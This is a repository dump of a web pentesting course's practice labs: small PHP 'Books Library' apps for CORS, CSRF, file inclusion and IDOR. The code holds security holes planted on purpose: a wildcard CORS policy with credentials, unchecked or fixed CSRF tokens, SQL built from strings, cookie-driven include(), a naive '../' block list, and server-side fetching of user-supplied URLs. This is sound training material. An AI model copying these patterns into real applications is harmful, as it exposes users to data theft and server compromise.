├── README.md
├── Udemy - Web Pentesting Course Slides.pptx
├── Web Pentesting Course Slides.pptx
├── labs
    ├── cors
    │   ├── index.php
    │   ├── info.php
    │   ├── login.php
    │   ├── profile.php
    │   └── style
    │   │   └── css.css
    ├── csrf
    │   ├── index.php
    │   ├── login.php
    │   ├── profile.php
    │   └── settings.php
    ├── file inclusion
    │   ├── add.php
    │   ├── files
    │   │   └── index.php
    │   ├── fun.php
    │   ├── index.php
    │   ├── login.php
    │   ├── msg.txt
    │   └── profile.php
    ├── idor
    │   ├── index.php
    │   ├── login.php
    │   └── profile.php
    ├── insecuredes
    │   ├── backup.bak
    │   ├── classes.php
    │   ├── index.php
    │   ├── login.php
    │   └── profile.php
    ├── jsonp
    │   ├── index.php
    │   ├── info.php
    │   ├── login.php
    │   └── profile.php
    ├── postmessage
    │   └── index.php
    ├── setup.txt
    ├── sql
    │   ├── exp.py
    │   ├── index.php
    │   ├── login.php
    │   ├── profile.php
    │   └── search.php
    ├── style
    │   └── css.css
    ├── upload
    │   ├── index.php
    │   ├── login.php
    │   └── profile.php
    ├── xss
    │   ├── XSS Fileters&Bypasses
    │   │   ├── endpoint.php
    │   │   ├── xss1.php
    │   │   ├── xss2.php
    │   │   ├── xss3.php
    │   │   ├── xss4.php
    │   │   ├── xss5.php
    │   │   └── xss6.php
    │   ├── about.php
    │   ├── contact.php
    │   ├── index.php
    │   ├── login.php
    │   ├── profile.php
    │   ├── search.php
    │   └── secret
    │   │   └── admin_panel.php
    └── xxe
    │   ├── check.php
    │   ├── index.php
    │   ├── login.php
    │   └── profile.php
└── labs_docker
    ├── Dockerfile
    ├── apache.conf
    ├── db.sql
    ├── main.sh
    └── src
        ├── config.php
        ├── cors
            ├── index.php
            ├── info.php
            ├── login.php
            ├── profile.php
            └── style
            │   └── css.css
        ├── csrf
            ├── index.php
            ├── login.php
            ├── profile.php
            └── settings.php
        ├── file inclusion
            ├── add.php
            ├── files
            │   └── index.php
            ├── fun.php
            ├── index.php
            ├── login.php
            ├── msg.txt
            └── profile.php
        ├── idor
            ├── index.php
            ├── login.php
            └── profile.php
        ├── index.html
        ├── insecuredes
            ├── backup.bak
            ├── classes.php
            ├── index.php
            ├── login.php
            └── profile.php
        ├── jsonp
            ├── index.php
            ├── info.php
            ├── login.php
            └── profile.php
        ├── postmessage
            └── index.php
        ├── sql
            ├── exp.py
            ├── index.php
            ├── login.php
            ├── profile.php
            └── search.php
        ├── style
            └── css.css
        ├── upload
            ├── index.php
            ├── login.php
            └── profile.php
        ├── xss
            ├── XSS Fileters&Bypasses
            │   ├── endpoint.php
            │   ├── xss1.php
            │   ├── xss2.php
            │   ├── xss3.php
            │   ├── xss4.php
            │   ├── xss5.php
            │   └── xss6.php
            ├── about.php
            ├── contact.php
            ├── index.php
            ├── login.php
            ├── profile.php
            ├── search.php
            └── secret
            │   └── admin_panel.php
        └── xxe
            ├── check.php
            ├── index.php
            ├── login.php
            └── profile.php


/README.md:
--------------------------------------------------------------------------------
1 | # Web Pen-Testing Course Files
2 | 
3 | Course Link: https://www.youtube.com/playlist?list=PLsB1gqjeUAh_yEuLgtZ0ppLlExcYOL2Kp
4 | 
5 | Udemy Course: https://www.udemy.com/course/web-application-penetration-testing-in-arabic/ (call me if you want it free [Twitter](https://twitter.com/FlEx0Geek))
6 | 
7 | Full Course on Youtube (Udemy course): https://www.youtube.com/playlist?list=PLsB1gqjeUAh_99a9LbVbxg-nBV79o0kW3
8 | 


--------------------------------------------------------------------------------
/Udemy - Web Pentesting Course Slides.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flex0geek/Web-PenTesting-Course-Files/82af033c24a137bd3e2e4a86c2989e4407311367/Udemy - Web Pentesting Course Slides.pptx


--------------------------------------------------------------------------------
/Web Pentesting Course Slides.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flex0geek/Web-PenTesting-Course-Files/82af033c24a137bd3e2e4a86c2989e4407311367/Web Pentesting Course Slides.pptx


--------------------------------------------------------------------------------
/labs/cors/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="profile.php">Profile</a>
13 |         <a href="login.php">Login</a>
14 |       </div>
15 |     </div>
16 |     <div>
17 |         <center>
18 |             <br><br><br><h3 id="type"></h3>
19 |         </center>
20 |     </div>
21 |     <script type="text/javascript">
22 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
23 |             i=0,
24 |             body=document.getElementById('bodyId');
25 |         body.onload = function(){
26 |             'use strict';
27 |             var typeWriter = setInterval(function(){
28 | 
29 |                 document.getElementById('type').innerHTML += msg[i];
30 |                 i = i + 1;
31 | 
32 |                 if(i>msg.length-1){
33 |                     clearInterval(typeWriter)
34 |                 }
35 |             }, 100);
36 |         }
37 |     </script>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs/cors/info.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 | 	header("Location: login.php");
 6 | 	die();
 7 | }
 8 | 
 9 | $origin = "mydomain.com";
10 | if ( strpos(@$_SERVER['HTTP_ORIGIN'], "mydomain.com") ){
11 | 	$origin = @$_SERVER['HTTP_ORIGIN'];
12 | }
13 | 
14 | header("Content-Type: application/json");
15 | header("Access-Control-Allow-Origin: *");
16 | header("Access-Control-Allow-Credentials: true");
17 | 
18 | echo '{"name":"Guest user", "phone number":"0234235","email":"email@gmail.com","adddress":"street 3","own books":["Book one","Book two","Book three"],"private books":["book 4","book 5"]}';


--------------------------------------------------------------------------------
/labs/cors/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest") {
 5 | 		$_SESSION['islogin'] = 1;
 6 | 		$_SESSION['username'] = $_POST['uname'];
 7 | 		header("Location: profile.php");
 8 | 	}else{
 9 | 		echo "<script>alert('Username/Password is invalid.')</script>";
10 | 	}
11 | }
12 | ?>
13 | <html>
14 |   <head>
15 |     <title>Books Library</title>
16 |     <link rel="stylesheet" type="text/css" href="style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="index.php">Home</a>
23 |         <a href="profile.php">Profile</a>
24 |         <a class="active" href="login.php">Login</a>
25 |       </div>
26 |     </div>
27 |     <div><br><br>
28 |     	<center>
29 |     	<form method="POST">
30 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
31 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
32 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
33 |     	</form>
34 |     	</center>
35 |     </div>
36 |   </body>
37 | </html>


--------------------------------------------------------------------------------
/labs/cors/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | session_start();
 4 | 
 5 | if($_SESSION['islogin'] != 1){
 6 |     header("Location: login.php");
 7 |     die();
 8 | }
 9 | 
10 | ?>
11 | 
12 | <html>
13 |   <head>
14 |     <title>Books Library</title>
15 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
16 |     <link rel="stylesheet" type="text/css" href="style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="index.php">Home</a>
23 |         <a class="active" href="profile.php">Profile</a>
24 |         <a href="login.php">Login</a>
25 |       </div>
26 |     </div>
27 |     <div>
28 |         <center>
29 |             <br><br><br><h3 id="type"></h3>
30 |         </center>
31 |     </div>
32 |     <script type="text/javascript">
33 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
34 |             i=0,
35 |             body=document.getElementById('bodyId');
36 |         body.onload = function(){
37 |             'use strict';
38 |             var typeWriter = setInterval(function(){
39 | 
40 |                 document.getElementById('type').innerHTML += msg[i];
41 |                 i = i + 1;
42 | 
43 |                 if(i>msg.length-1){
44 |                     clearInterval(typeWriter)
45 |                 }
46 |             }, 100);
47 |         }
48 |     </script>
49 |   </body>
50 | </html>


--------------------------------------------------------------------------------
/labs/cors/style/css.css:
--------------------------------------------------------------------------------
  1 | #name{
  2 |   width: 300px;
  3 |   height: 30px;
  4 |   text-align: center;
  5 |   border-radius: 4px;
  6 | }
  7 | input{border-style: solid;background: #f1f1f1;}
  8 | input[type="submit"]{
  9 |     width: 60px;
 10 |     height: 30px;
 11 | }
 12 | 
 13 | #fname, #email{
 14 |   height: 40px;
 15 |   text-align: center;
 16 | }
 17 | #send{
 18 |   background-color: dodgerblue;
 19 |   height: 40px
 20 | }
 21 | #msg{
 22 |   height: 200px;
 23 |   background: #f1f1f1;
 24 | }
 25 | 
 26 | #pwd,#uname,#fname, #email, #msg, #send{
 27 |   width: 400px;
 28 |   margin: 2px;
 29 |   border-style: solid;
 30 | }
 31 | 
 32 | #search{
 33 |   color: black;
 34 |   text-align: center;
 35 |   text-decoration: none;
 36 |   border-radius: 4px;
 37 | }
 38 | body{background: #f1f1f1;}
 39 | #type{
 40 |   width: 400px;
 41 | }
 42 | 
 43 | /* Style the header with a grey background and some padding */
 44 | .header {
 45 |   overflow: hidden;
 46 |   background-color: #f1f1f1;
 47 |   padding: 20px 10px;
 48 | }
 49 | 
 50 | /* Style the header links */
 51 | .header a {
 52 |   float: left;
 53 |   color: black;
 54 |   text-align: center;
 55 |   padding: 12px;
 56 |   text-decoration: none;
 57 |   font-size: 18px;
 58 |   line-height: 25px;
 59 |   border-radius: 4px;
 60 | }
 61 | 
 62 | /* Style the logo link (notice that we set the same value of line-height and font-size to prevent the header to increase when the font gets bigger */
 63 | .header a.logo {
 64 |   font-size: 25px;
 65 |   font-weight: bold;
 66 | }
 67 | 
 68 | /* Change the background color on mouse-over */
 69 | .header a:hover {
 70 |   background-color: #ddd;
 71 |   color: black;
 72 | }
 73 | 
 74 | /* Style the active/current link*/
 75 | .header a.active {
 76 |   background-color: dodgerblue;
 77 |   color: white;
 78 | }
 79 | 
 80 | /* Float the link section to the right */
 81 | .header-right {
 82 |   float: right;
 83 | }
 84 | 
 85 | /* Add media queries for responsiveness - when the screen is 500px wide or less, stack the links on top of each other */
 86 | @media screen and (max-width: 500px) {
 87 |   .header a {
 88 |     float: none;
 89 |     display: block;
 90 |     text-align: left;
 91 |   }
 92 |   .header-right {
 93 |     float: none;
 94 |   }
 95 | }
 96 | 
 97 | .be-comment-block {
 98 |     margin-bottom: 50px !important;
 99 |     border: 1px solid #edeff2;
100 |     border-radius: 2px;
101 |     padding: 50px 70px;
102 |     border:1px solid #ffffff;
103 | }
104 | 
105 | .comments-title {
106 |     font-size: 16px;
107 |     color: #262626;
108 |     margin-bottom: 15px;
109 |     font-family: 'Conv_helveticaneuecyr-bold';
110 | }
111 | 
112 | .be-img-comment {
113 |     width: 60px;
114 |     height: 60px;
115 |     float: left;
116 |     margin-bottom: 15px;
117 | }
118 | 
119 | .be-ava-comment {
120 |     width: 60px;
121 |     height: 60px;
122 |     border-radius: 50%;
123 | }
124 | 
125 | .be-comment-content {
126 |     margin-left: 80px;
127 | }
128 | 
129 | .be-comment-content span {
130 |     display: inline-block;
131 |     width: 49%;
132 |     margin-bottom: 15px;
133 | }
134 | 
135 | .be-comment-name {
136 |     font-size: 13px;
137 |     font-family: 'Conv_helveticaneuecyr-bold';
138 | }
139 | 
140 | .be-comment-content a {
141 |     color: #383b43;
142 | }
143 | 
144 | .be-comment-content span {
145 |     display: inline-block;
146 |     width: 49%;
147 |     margin-bottom: 15px;
148 | }
149 | 
150 | .be-comment-time {
151 |     text-align: right;
152 | }
153 | 
154 | .be-comment-time {
155 |     font-size: 11px;
156 |     color: #b4b7c1;
157 | }
158 | 
159 | .be-comment-text {
160 |     font-size: 13px;
161 |     line-height: 18px;
162 |     color: #7a8192;
163 |     display: block;
164 |     background: #f6f6f7;
165 |     border: 1px solid #edeff2;
166 |     padding: 15px 20px 20px 20px;
167 | }
168 | 
169 | .form-group.fl_icon .icon {
170 |     position: absolute;
171 |     top: 1px;
172 |     left: 16px;
173 |     width: 48px;
174 |     height: 48px;
175 |     background: #f6f6f7;
176 |     color: #b5b8c2;
177 |     text-align: center;
178 |     line-height: 50px;
179 |     -webkit-border-top-left-radius: 2px;
180 |     -webkit-border-bottom-left-radius: 2px;
181 |     -moz-border-radius-topleft: 2px;
182 |     -moz-border-radius-bottomleft: 2px;
183 |     border-top-left-radius: 2px;
184 |     border-bottom-left-radius: 2px;
185 | }
186 | .form-input{
187 |   border: 1px solid #000;
188 |   border-radius: 3px;
189 | }
190 | .form-group{
191 |   border: 1px solid #edeff2;
192 |   border-radius: 3px;
193 | }
194 | .form-group .form-input {
195 |     font-size: 13px;
196 |     line-height: 50px;
197 |     font-weight: 400;
198 |     color: #000;
199 |     width: 100%;
200 |     height: 50px;
201 |     padding-left: 20px;
202 |     padding-right: 20px;
203 | }
204 | 
205 | .form-group.fl_icon .form-input {
206 |     padding-left: 70px;
207 | }
208 | 
209 | .form-group textarea.form-input {
210 |     height: 150px;
211 | }


--------------------------------------------------------------------------------
/labs/csrf/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="profile.php">Profile</a>
13 |         <a href="login.php">Login</a>
14 |       </div>
15 |     </div>
16 |     <div>
17 |         <center>
18 |             <br><br><br><h3 id="type"></h3>
19 |         </center>
20 |     </div>
21 |     <script type="text/javascript">
22 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
23 |             i=0,
24 |             body=document.getElementById('bodyId');
25 |         body.onload = function(){
26 |             'use strict';
27 |             var typeWriter = setInterval(function(){
28 | 
29 |                 document.getElementById('type').innerHTML += msg[i];
30 |                 i = i + 1;
31 | 
32 |                 if(i>msg.length-1){
33 |                     clearInterval(typeWriter)
34 |                 }
35 |             }, 100);
36 |         }
37 |     </script>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs/csrf/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest") {
 5 | 		$_SESSION['islogin'] = 1;
 6 | 		$_SESSION['username'] = $_POST['uname'];
 7 | 		header("Location: profile.php");
 8 | 	}else{
 9 | 		echo "<script>alert('Username/Password is invalid.')</script>";
10 | 	}
11 | }
12 | ?>
13 | <html>
14 |   <head>
15 |     <title>Books Library</title>
16 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="index.php">Home</a>
23 |         <a href="profile.php">Profile</a>
24 |         <a class="active" href="login.php">Login</a>
25 |       </div>
26 |     </div>
27 |     <div><br><br>
28 |     	<center>
29 |     	<form method="POST">
30 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
31 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
32 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
33 |     	</form>
34 |     	</center>
35 |     </div>
36 |   </body>
37 | </html>


--------------------------------------------------------------------------------
/labs/csrf/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 | 	header("Location: login.php");
 6 | 	die();
 7 | }
 8 | 
 9 | $conn = mysqli_connect('localhost', 'root', '', 'test');
10 | 
11 | $csrfToken = md5("SECRET");
12 | 
13 | if( isset($_POST['csrfToken']) && isset($_POST['comment']) && $_POST['csrfToken'] == $csrfToken ){
14 |     $uname = htmlentities($_SESSION['username']);
15 |     $comment = htmlentities($_POST['comment']);
16 |     $link = "#";
17 |     $sql = "INSERT INTO comments values('$uname','$comment','$link')";
18 |     $res = mysqli_query($conn, $sql);
19 | }
20 | 
21 | $sql = "SELECT * FROM comments";
22 | 
23 | $result = mysqli_query($conn, $sql);
24 | 
25 | ?>
26 | <html>
27 |   <head>
28 |     <title>Books Library</title>
29 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
30 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
31 |   </head>
32 |   <body id="bodyId">
33 |     <div class="header">
34 |       <a href="index.php" class="logo">Books Library</a>
35 |       <div class="header-right">
36 |         <a href="index.php">Home</a>
37 |         <a class="active" href="profile.php">Profile</a>
38 |         <a href="settings.php">Settings</a>
39 |         <a href="login.php">Login</a>
40 |       </div>
41 |     </div>
42 |     <div class="container">
43 |     <div class="be-comment-block">
44 |         <div class="be-comment">
45 |         <?php
46 | 			while($rows=mysqli_fetch_array($result)){
47 | 			    echo '<span class="be-comment-name">';
48 | 			    echo '<a href="'.$rows['link'].'">'.$rows['uname'].'</a></span>';
49 | 			    echo '<p class="be-comment-text">'.$rows['comment'].'</p>';
50 | 			    echo '</div>';
51 | 			}
52 |         ?>
53 |         </div>
54 |         <form class="form-block" method="post">
55 |             <div class="row">
56 |                 <div class="col-xs-12">                         
57 |                     <div class="form-group">
58 |                         <textarea name="comment" class="form-input" required="" placeholder="Your text"></textarea><br>
59 |                         <input type="hidden" name="csrfToken" value="<?php echo $csrfToken;?>">
60 |                     </div>
61 |                 </div>
62 |                 <input style="width: 100px;" type="submit" value="Comment">
63 |             </div>
64 |         </form>
65 |     </div>
66 |     </div>
67 |   </body>
68 | </html>


--------------------------------------------------------------------------------
/labs/csrf/settings.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | $conn = mysqli_connect('localhost', 'root','','test');
 4 | if(isset($_POST['csrftoken']) && isset($_POST['nemail'])){
 5 | 
 6 |   $csrftoken = $_POST['csrftoken'];
 7 |   $newEmail = addslashes($_POST['nemail']);
 8 | 
 9 |   $sql2update = "UPDATE users_csrf SET email='$newEmail' WHERE username='guest';";
10 |   $res2update = mysqli_query($conn, $sql2update);
11 | 
12 | }
13 | 
14 | // if(isset($_POST['csrftoken']) && isset($_POST['nemail'])){
15 | //   if($_SESSION['t'] != $_POST['csrftoken']){
16 | //     echo "<script>alert('CSRF Token invalid.')</script>";
17 | //   }else{
18 | //     $csrftoken = $_POST['csrftoken'];
19 | //     $newEmail = addslashes($_POST['nemail']);
20 | 
21 | //     $sql2update = "UPDATE users_csrf SET email='$newEmail' WHERE username='guest';";
22 | //     $res2update = mysqli_query($conn, $sql2update);
23 | //   }
24 | // }
25 | 
26 | $token = md5(random_bytes(100));
27 | // $_SESSION['t'] = $token;
28 | 
29 | 
30 | $sql2getEmail = "SELECT email FROM users_csrf";
31 | $res2getEmail = mysqli_query($conn, $sql2getEmail);
32 | $rows = mysqli_fetch_array($res2getEmail);
33 | 
34 | ?>
35 | <html>
36 |   <head>
37 |     <title>Books Library</title>
38 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
39 |   </head>
40 |   <body id="bodyId">
41 |     <div class="header">
42 |       <a href="index.php" class="logo">Books Library</a>
43 |       <div class="header-right">
44 |         <a href="index.php">Home</a>
45 |         <a href="profile.php">Profile</a>
46 |         <a class="active" href="settings.php">Settings</a>
47 |         <a href="login.php">Login</a>
48 |       </div>
49 |     </div>
50 |     <div><br><br>
51 |     	<center>
52 |     		<h2>Email: <?php if($rows){echo $rows['email'];}?></h2>
53 |     		<hr>
54 |     	<form method="POST">
55 |     		
56 |     		<div>
57 |     			<input id="email" type="text" name="nemail" placeholder="New Email">
58 |     			<input type="hidden" name="csrftoken" value="<?php echo $token;?>">
59 |     		</div>
60 | 
61 |     		<input type="submit" id="send" value="Change" style="background-color: dodgerblue;">
62 |     	</form>
63 |     	</center>
64 |     </div>
65 |   </body>
66 | </html>


--------------------------------------------------------------------------------
/labs/file inclusion/add.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | include 'fun.php';
 4 | $msg = "";
 5 | if(isset($_POST['url'])){
 6 |     $url = $_POST['url'];
 7 |     if(!strpos($url, ".json")){
 8 |         $msg = "Not allowed extension, try (json) extension.";
 9 |     }else{
10 |         $urlSplit = explode("/", $url);
11 |         $file = $urlSplit[count($urlSplit)-1];
12 |         get($url, $file);
13 |     }
14 | }
15 | 
16 | ?>
17 | <html>
18 |   <head>
19 |     <title>Books Library</title>
20 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
21 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
22 |   </head>
23 |   <body id="bodyId">
24 |     <div class="header">
25 |       <a href="index.php" class="logo">Books Library</a>
26 |       <div class="header-right">
27 |         <a href="index.php">Home</a>
28 |         <a href="profile.php">Profile</a>
29 |         <a class="active" href="add.php">Add</a>
30 |         <a href="login.php">Login</a>
31 |       </div>
32 |     </div>
33 |     <div>
34 |         <center>
35 |             <form method="post">
36 |                 <input id=email type="url" name="url" autocomplete="off" placeholder="URL to file"><br>
37 |                 <input id=send type="submit" value="get content">
38 |             </form>
39 |             <p><?php if($msg != ""){echo $msg;}?></p>
40 |         </center>
41 |     </div>
42 |   </body>
43 | </html>


--------------------------------------------------------------------------------
/labs/file inclusion/files/index.php:
--------------------------------------------------------------------------------
1 | <h1>Forbidden.</h1>


--------------------------------------------------------------------------------
/labs/file inclusion/fun.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | function read($fileName){
 4 | 	@include $fileName;
 5 | }
 6 | 
 7 | function get($url, $name){
 8 | 	$ch = curl_init();
 9 | 	curl_setopt($ch, CURLOPT_URL, $url);
10 | 	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
11 | 	curl_setopt($ch, CURLOPT_TIMEOUT, 10);
12 | 	$data = curl_exec($ch);
13 | 
14 | 	if(!$data){
15 | 		$data = @file_get_contents($url);
16 | 	}
17 | 	@file_put_contents("files/".$name, $data);
18 | }
19 | 
20 | function getFile($file){
21 | 	$path =__DIR__.$file;
22 | 	$open = @fopen($path,"r");
23 | 	$data = @fread($open,8192);
24 | 
25 | 	echo $data;
26 | 	@fclose($open);
27 | }


--------------------------------------------------------------------------------
/labs/file inclusion/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | include 'fun.php';
 4 | 
 5 | $f = @$_GET['f'];
 6 | $blocked = array('../');
 7 | 
 8 | if( !in_array($f, $blocked) ){
 9 |     getFile($f);
10 | }
11 | 
12 | // Delete lines fomr 5 to 10
13 | ?>
14 | <html>
15 |   <head>
16 |     <title>Books Library</title>
17 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
18 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
19 |   </head>
20 |   <body id="bodyId">
21 |     <div class="header">
22 |       <a href="index.php" class="logo">Books Library</a>
23 |       <div class="header-right">
24 |         <a class="active" href="index.php">Home</a>
25 |         <a href="profile.php">Profile</a>
26 |         <a href="add.php">Add</a>
27 |         <a href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div>
31 |         <center>
32 |             <br><br><br><h3 id="type"></h3>
33 |         </center>
34 |     </div>
35 |     <script type="text/javascript">
36 |         var msg = "Welcome.",
37 |             i=0,
38 |             body=document.getElementById('bodyId');
39 |         body.onload = function(){
40 |             'use strict';
41 |             var typeWriter = setInterval(function(){
42 | 
43 |                 document.getElementById('type').innerHTML += msg[i];
44 |                 i = i + 1;
45 | 
46 |                 if(i>msg.length-1){
47 |                     clearInterval(typeWriter)
48 |                 }
49 |             }, 100);
50 |         }
51 |     </script>
52 |   </body>
53 | </html>


--------------------------------------------------------------------------------
/labs/file inclusion/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest") {
 5 | 		$_SESSION['islogin'] = 1;
 6 | 		$_SESSION['username'] = $_POST['uname'];
 7 | 		setcookie("msg","msg.txt",time()+3600);
 8 | 		setcookie("uid","2356452745678",time()+3600);
 9 | 		setcookie("sessionid","asdfS4DFJ3ty354yV4uyvuvSDFVg",time()+3600);
10 | 		header("Location: profile.php");
11 | 	}else{
12 | 		echo "<script>alert('Username/Password is invalid.')</script>";
13 | 	}
14 | }
15 | ?>
16 | <html>
17 |   <head>
18 |     <title>Books Library</title>
19 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
20 |   </head>
21 |   <body id="bodyId">
22 |     <div class="header">
23 |       <a href="index.php" class="logo">Books Library</a>
24 |       <div class="header-right">
25 |         <a href="index.php">Home</a>
26 |         <a href="profile.php">Profile</a>
27 |         <a class="active" href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div><br><br>
31 |     	<center>
32 |     	<form method="POST">
33 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
34 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
35 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
36 |     	</form>
37 |     	</center>
38 |     </div>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
/labs/file inclusion/msg.txt:
--------------------------------------------------------------------------------
1 | Welcome To our website.We will servie you as best as we can, if you have any issue send to us.


--------------------------------------------------------------------------------
/labs/file inclusion/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | include 'fun.php';
 4 | if($_SESSION['islogin'] != 1){
 5 |     header("Location: login.php");
 6 |     die();
 7 | }
 8 | 
 9 | ?>
10 | <html>
11 |   <head>
12 |     <title>Books Library</title>
13 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
14 |   </head>
15 |   <body id="bodyId">
16 |     <div class="header">
17 |       <a href="index.php" class="logo">Books Library</a>
18 |       <div class="header-right">
19 |         <a href="index.php">Home</a>
20 |         <a class="active" href="profile.php">Profile</a>
21 |         <a href="add.php">Add</a>
22 |         <a href="login.php">Login</a>
23 |       </div>
24 |     </div>
25 |     <div><br><br>
26 | <div>
27 |         <center>
28 |             <br><br><br><h3 id="type"><?php @include $_COOKIE['msg']?></h3>
29 |         </center>
30 |     </div>
31 |     </div>
32 |   </body>
33 | </html>


--------------------------------------------------------------------------------
/labs/idor/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="profile.php">Profile</a>
13 |         <a href="login.php">Login</a>
14 |       </div>
15 |     </div>
16 |     <div>
17 |         <center>
18 |             <br><br><br><h3 id="type"></h3>
19 |         </center>
20 |     </div>
21 |     <script type="text/javascript">
22 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
23 |             i=0,
24 |             body=document.getElementById('bodyId');
25 |         body.onload = function(){
26 |             'use strict';
27 |             var typeWriter = setInterval(function(){
28 | 
29 |                 document.getElementById('type').innerHTML += msg[i];
30 |                 i = i + 1;
31 | 
32 |                 if(i>msg.length-1){
33 |                     clearInterval(typeWriter)
34 |                 }
35 |             }, 100);
36 |         }
37 |     </script>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs/idor/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 |     if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest") {
 5 |         $_SESSION['islogin'] = 1;
 6 |         $_SESSION['username'] = $_POST['uname'];
 7 |         setcookie("uid","a9b6b5a8a81a04a77ce3c809a94fda13",time()+3600);
 8 |         setcookie("sessionid","5de6277abc3a11b8ad3e5b7ce97aa5be",time()+3600);
 9 |         setcookie("dump","d9d4f495e875a2e075a1a4a6e1b9770f",time()+3600);
10 |         header("Location: profile.php");
11 |     }else{
12 |         echo "<script>alert('Username/Password is invalid.')</script>";
13 |     }
14 | }
15 | ?>
16 | <html>
17 |   <head>
18 |     <title>Books Library</title>
19 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
20 |   </head>
21 |   <body id="bodyId">
22 |     <div class="header">
23 |       <a href="index.php" class="logo">Books Library</a>
24 |       <div class="header-right">
25 |         <a href="index.php">Home</a>
26 |         <a href="profile.php">Profile</a>
27 |         <a class="active" href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div><br><br>
31 |         <center>
32 |         <form method="POST">
33 |             <input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
34 |             <input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
35 |             <input type="submit" value="Login" style="background-color: dodgerblue;">
36 |         </form>
37 |         </center>
38 |     </div>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
